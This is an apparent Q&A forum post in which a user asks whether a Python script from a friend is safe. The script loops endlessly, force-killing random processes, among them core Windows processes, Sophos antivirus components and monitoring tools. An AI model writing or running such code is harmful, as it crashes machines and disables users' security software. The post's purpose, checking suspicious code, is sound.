# How safe is this python code and should I run this

Tags: python

A friend sent me this code and I think it is unsafe and someone tell me.

```
import random
import os
x = 1
Applications = ["vlc.exe","System","smss.exe","csrss.exe","wininit.exe",
    "csrss.exe","winlogon.exe","services.exe","lsass.exe","svchost.exe",
    "svchost.exe","dwm.exe","WUDFHost.exe","SEDService.exe","vmacthlp.exe",
    "SavService.exe","spoolsv.exe","activcontrolsvc.exe","mDNSResponder.exe",
    "armsvc.exe","EwServer.exe","sqlservr.exe","AGSService.exe",
    "SAVAdminService.exe","remotesolverdispatcherser","sqlwriter.exe",
    "swc_service.exe","SophosCleanM.exe","sqlbrowser.exe",
    "SophosSafestore64.exe","McsAgent.exe","SophosHealth.exe","McsClient.exe",
    "VGAuthService.exe","USBDLM.exe","SynTPEnhService.exe","Memory_Compression",
    "dispatcher.exe","SophosFS.exe","conhost.exe","SophosFileScanner.exe",
    "SSPService.exe","dllhost.exe","msdtc.exe","unsecapp.exe","notepad.exe",
    "wscript.exe","sihost.exe","taskhostw.exe","USBDLM_usr.exe",
    "RuntimeBroker.exe","nexplorer.exe","SynTPEnh.exe","ShellExperienceHost.exe",
    "SearchIndexer.exe","SearchUI.exe","GoogleCrashHandler.exe",
    "GoogleCrashHandler64.exe","activmgr.exe","ImperoGuardianSVC.exe",
    "ImperoClientSVC.exe","igfxtray.exe","hkcmd.exe","igfxpers.exe",
    "Sophos_UI.exe","Spotify.exe","FOGUserService.exe","sldworks_fs.exe",
    "audiodg.exe","ImperoRelay.exe","ImperoClient.exe",
    "ImperoWinlogonApplication","alg.exe","FOGService.exe","rundll32.exe",
    "WmiPrvSE.exe","SearchProtocolHost.exe","MetroAppInterface.exe","Code.exe",
    "CodeHelper.exe","conhost.exe","python.exe","conhost.exe",
    "SearchFilterHost.exe","chrome.exe","backgroundTaskHost.exe","Discord.exe",
    "pythonw.exe","tasklist.exe","conhost.exe"]
while x == 1:
    Stop_This_Application = random.choice(Applications)
    os.system("TASKKILL /F /IM " + Stop_This_Application)
```

Comment: The print command is to allow me to post the past bin link

Comment: If you can't post something because it's not formatted correctly, the solution is to format it correctly.

Comment: I don't understand what was wrong with the format that is why

Comment: For the future: [How do I format my code blocks?](https://meta.stackexchange.com/questions/22186/how-do-i-format-my-code-blocks)

Answer (score 0, accepted):

The code will try to stop randomly all the applications listed in the Applications list.
After a reboot, the system will work as usual.